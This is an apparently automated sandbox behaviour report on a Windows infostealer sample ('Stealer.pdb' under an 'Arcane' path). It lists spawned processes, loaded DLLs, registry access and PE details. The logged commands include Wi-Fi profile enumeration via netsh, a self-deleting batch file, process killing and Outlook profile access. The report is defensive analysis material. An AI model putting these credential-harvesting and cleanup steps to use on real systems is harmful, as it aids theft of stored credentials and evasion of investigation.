                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 1352
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 3228
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.batJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 1352Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: zyEDYRU0jw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: zyEDYRU0jw.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: zyEDYRU0jw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: System.Xml.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Windows.Forms.pdbMZ@ source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: Stealer.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.pdbSystem.ni.dll source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: C:\Users\Malware\Desktop\Arcane\Str\Stealer\Stealer\obj\Release\Stealer.pdb source: zyEDYRU0jw.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Net.Http.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Security.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.IO.Compression.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Configuration.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Xml.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: mscorlib.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: LOGLOA~1.PDBwinload_prod.pdb source: zyEDYRU0jw.exe, 00000000.00000002.2256448828.0000000005B1A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: acation Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA93)W source: zyEDYRU0jw.exe, 00000000.00000002.2256448828.0000000005B31000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Net.Http.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Management.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Drawing.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Drawing.pdb < source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: mscorlib.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Management.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Management.pdbMZ@ source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.IO.Compression.pdbH source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: zyEDYRU0jw.exeStatic PE information: 0xB880F835 [Fri Feb 3 01:58:13 2068 UTC]
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D3C235 push ebx; retn 0000h0_2_00D3C32A
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D3C320 push ebx; retn 0000h0_2_00D3C32A
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D324A9 push ebx; ret 0_2_00D324B6
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D30660 pushad ; ret 0_2_00D30672
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D32620 push esp; ret 0_2_00D3262E
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D30B87 push ebx; ret 0_2_00D30B9A
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D314DF pushad ; ret 0_2_00D314FE
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D314BF pushad ; ret 0_2_00D314DE
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D35A77 pushfd ; ret 0_2_00D35A86
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D35B31 pushfd ; ret 0_2_00D35B3E
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0F2F6 push esp; retf 0_2_06D0F2F7
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0F318 push esp; retf 0_2_06D0F329
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D058D9 pushad ; retn 0000h0_2_06D058DA
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D058E0 pushad ; retn 0000h0_2_06D058EA
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D09171 push ss; retn 0000h0_2_06D09172
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06E70922 pushad ; iretd 0_2_06E70929
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
